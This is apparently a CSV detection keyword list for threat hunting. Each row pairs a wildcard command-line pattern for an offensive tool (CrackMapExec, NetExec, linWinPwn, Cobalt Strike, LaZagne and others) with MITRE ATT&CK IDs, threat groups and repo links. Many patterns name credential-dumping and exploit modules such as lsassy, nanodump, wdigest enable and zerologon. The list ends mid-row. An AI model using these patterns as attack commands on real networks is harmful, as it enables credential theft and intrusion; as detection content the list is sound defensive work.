-* -M ldap-checker *,offensive_tool_keyword,NetExec,NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.,T1069 - T1021 - T1136 - T1018,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Credential Access,https://github.com/Pennyw0rth/NetExec,1,0,N/A,10,6,525,54,2023-10-03T21:19:24Z,2023-09-08T15:36:00Z
-* -M lsassy *,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,0,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z
-* -M MAQ --kdcHost *,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,0,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z
-* -M masky *CA=*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,0,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z
-* -M ms17-010 *,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - 
TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,0,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z
-* -M mssql_priv *,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,0,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z
-* -M multirdp*,offensive_tool_keyword,crackmapexec,crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks,T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002,TA0002 - TA0006 - TA0007,N/A,APT39 - Dragonfly - FIN7 - MuddyWater,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,0,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z
-* -M nanodump *,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,0,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z
-* -m olecmd -o *powershell *,offensive_tool_keyword,SQLRecon,A C# MS SQL toolkit designed for offensive reconnaissance and post-exploitation,T1003.003 - T1049 - T1059.005 - T1078.003,TA0005 - TA0006 - TA0002 - TA0004,N/A,N/A,Network Exploitation 
Tools,https://github.com/skahwah/SQLRecon,1,0,N/A,N/A,6,502,97,2023-08-10T00:42:31Z,2021-11-19T15:58:49Z
-* -M pe_inject*,offensive_tool_keyword,crackmapexec,crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks,T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002,TA0002 - TA0006 - TA0007,N/A,APT39 - Dragonfly - FIN7 - MuddyWater,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,0,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z
-* -M petitpotam *,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,0,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z
-* -M petitpotam*,offensive_tool_keyword,NetExec,NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.,T1069 - T1021 - T1136 - T1018,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Credential Access,https://github.com/Pennyw0rth/NetExec,1,0,N/A,10,6,525,54,2023-10-03T21:19:24Z,2023-09-08T15:36:00Z
-* -M printnightmare *,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,0,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z
-* -m 
privileged-users --full *,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,0,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z
-* -M procdump ,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,0,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z
-* -m rdrleakdiag -M masterkeys*,offensive_tool_keyword,dploot,DPAPI looting remotely in Python,T1003.006 - T1027 - T1110.004,TA0006 - TA0007 - TA0010,N/A,N/A,Credential Access,https://github.com/zblurx/dploot,1,0,N/A,10,3,279,23,2023-09-30T11:10:26Z,2022-05-24T11:05:21Z
-* -m run_command -c *.exe*,offensive_tool_keyword,ysoserial.net,Deserialization payload generator for a variety of .NET formatters,T1059.007 - T1027.002 - T1059.001,TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/pwntester/ysoserial.net,1,0,N/A,10,10,2723,442,2023-06-27T12:08:11Z,2017-09-18T17:48:08Z
-* -M runasppl *,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,0,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z
-* -M scuffy -o SERVER=127.0.0.1*,offensive_tool_keyword,NetExec,NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.,T1069 - T1021 - T1136 - 
T1018,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Credential Access,https://github.com/Pennyw0rth/NetExec,1,0,N/A,10,6,525,54,2023-10-03T21:19:24Z,2023-09-08T15:36:00Z
-* -M scuffy*,offensive_tool_keyword,crackmapexec,crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks,T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002,TA0002 - TA0006 - TA0007,N/A,APT39 - Dragonfly - FIN7 - MuddyWater,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,0,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z
-* -M shadowcoerce *,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,0,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z
-* -M shadowcoerce*,offensive_tool_keyword,NetExec,NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.,T1069 - T1021 - T1136 - T1018,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Credential Access,https://github.com/Pennyw0rth/NetExec,1,0,N/A,10,6,525,54,2023-10-03T21:19:24Z,2023-09-08T15:36:00Z
-* -M shellcode_inject*,offensive_tool_keyword,crackmapexec,crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks,T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002,TA0002 - TA0006 - TA0007,N/A,APT39 - Dragonfly - FIN7 - MuddyWater,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,0,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z
-* -m SimpleHTTPServer *,greyware_tool_keyword,simplehttpserver,quick web server in python,T1021.002 - T1059.006,TA0002 - TA0005,N/A,N/A,Data Exfiltration,https://docs.python.org/2/library/simplehttpserver.html,1,0,N/A,6,10,N/A,N/A,N/A,N/A
-* -M slinky,offensive_tool_keyword,crackmapexec,crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks,T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002,TA0002 - TA0006 - TA0007,N/A,APT39 - Dragonfly - FIN7 - MuddyWater,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,0,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z
-* -M slinky -o SERVER=*,offensive_tool_keyword,NetExec,NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.,T1069 - T1021 - T1136 - T1018,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Credential Access,https://github.com/Pennyw0rth/NetExec,1,0,N/A,10,6,525,54,2023-10-03T21:19:24Z,2023-09-08T15:36:00Z
-* -M spider_plus *,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability 
checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,0,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z
-* -M spider_plus -o MAX_FILE_SIZE=100*,offensive_tool_keyword,NetExec,NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.,T1069 - T1021 - T1136 - T1018,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Credential Access,https://github.com/Pennyw0rth/NetExec,1,0,N/A,10,6,525,54,2023-10-03T21:19:24Z,2023-09-08T15:36:00Z
-* -M teams_localdb *,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,0,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z
-* -M tokens*,offensive_tool_keyword,crackmapexec,crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks,T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002,TA0002 - TA0006 - TA0007,N/A,APT39 - Dragonfly - FIN7 - MuddyWater,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,0,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z
-* -M uac,offensive_tool_keyword,crackmapexec,crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks,T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002,TA0002 - TA0006 - TA0007,N/A,APT39 - Dragonfly - FIN7 - MuddyWater,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,0,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z
-* -m venv csexec *,offensive_tool_keyword,CSExec,An alternative to *exec.py from impacket with some builtin tricks,T1059.001 - T1059.005 - T1071.001,TA0002,N/A,N/A,Lateral Movement,https://github.com/Metro-Holografix/CSExec.py,1,0,private github repo,10,,N/A,,,
-* -M wdigest -o ACTION=disable*,offensive_tool_keyword,NetExec,NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.,T1069 - T1021 - T1136 - T1018,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Credential Access,https://github.com/Pennyw0rth/NetExec,1,0,N/A,10,6,525,54,2023-10-03T21:19:24Z,2023-09-08T15:36:00Z
-* -M wdigest -o ACTION=enable*,offensive_tool_keyword,NetExec,NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.,T1069 - T1021 - T1136 - T1018,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Credential Access,https://github.com/Pennyw0rth/NetExec,1,0,N/A,10,6,525,54,2023-10-03T21:19:24Z,2023-09-08T15:36:00Z
-* -M web_delivery*,offensive_tool_keyword,crackmapexec,crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks,T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002,TA0002 - TA0006 - TA0007,N/A,APT39 - Dragonfly - FIN7 - MuddyWater,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,0,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z
-* -M zerologon *,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,0,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z
-* m3-gen.py *,offensive_tool_keyword,MaliciousMacroMSBuild,Generates Malicious Macro and Execute Powershell or Shellcode via MSBuild Application Whitelisting Bypass.,T1059.001 - T1059.003 - T1127 - T1027.002,TA0002 - TA0004,N/A,N/A,Defense Evasion,https://github.com/infosecn1nja/MaliciousMacroMSBuild,1,0,N/A,8,5,488,117,2019-08-06T08:16:05Z,2018-04-09T23:16:30Z
-* malleable.profile*,offensive_tool_keyword,cobaltstrike,Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. 
scanners through packet inspection and malleable profile correlation,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/mgeeky/RedWarden,1,0,N/A,10,10,820,138,2022-10-07T14:05:25Z,2021-05-15T22:05:39Z
-* malleable-c2-randomizer*,offensive_tool_keyword,cobaltstrike,A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - 
TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/bluscreenofjeff/Malleable-C2-Randomizer,1,0,N/A,10,10,421,96,2022-09-09T15:50:16Z,2017-05-31T15:44:43Z
-* mask?a?a?a?a?*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,0,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z
-* --mask=?1?1?1* --min-len*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,0,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z
-* --max-attack-time*,offensive_tool_keyword,wapiti,Web vulnerability scanner written in Python3,T1592 - T1592.003,TA0007 - TA0040,N/A,N/A,Web Attacks,https://github.com/wapiti-scanner/wapiti,1,0,N/A,N/A,8,785,132,2023-09-27T07:26:22Z,2020-06-06T20:17:55Z
-* maxdb-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-* mcafee-epo-agent.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-* -mdns y -mdnsunicast n*,offensive_tool_keyword,Inveigh,.NET IPv4/IPv6 machine-in-the-middle tool for penetration testers,T1550.002 - T1059.001 - T1071.001,TA0002,N/A,N/A,Sniffing & Spoofing,https://github.com/Kevin-Robertson/Inveigh,1,0,N/A,10,10,2212,441,2023-06-13T01:36:42Z,2015-04-02T18:04:41Z
-* -mDNSTTL *,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - 
APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z
-* membase-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-* membase-http-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-* memcached-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-* memorpy *,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,0,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z
-* memorydump.py*,offensive_tool_keyword,LaZagne,The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.,T1552 - T1003 - T1555,TA0006 - TA0008,N/A,N/A,Credential Access,https://github.com/AlessandroZ/LaZagne,1,0,N/A,10,10,8527,1980,2023-08-12T12:38:22Z,2015-02-16T14:10:02Z
-* memreader.c *,offensive_tool_keyword,cobaltstrike,MemReader Beacon Object File will allow you to search and extract specific strings from a target process memory and return what is found to the beacon output,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - 
T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trainr3kt/MemReader_BoF,1,0,N/A,10,10,26,3,2022-05-12T18:46:02Z,2021-04-21T20:51:25Z
-* MemReader_BoF*,offensive_tool_keyword,cobaltstrike,MemReader Beacon Object File will allow you to search and extract specific strings from a target process memory and return what is found to the beacon output,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trainr3kt/MemReader_BoF,1,0,N/A,10,10,26,3,2022-05-12T18:46:02Z,2021-04-21T20:51:25Z
-* merlin.py *,offensive_tool_keyword,mythic,Cross-platform post-exploitation HTTP Command & Control agent written in golang,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 
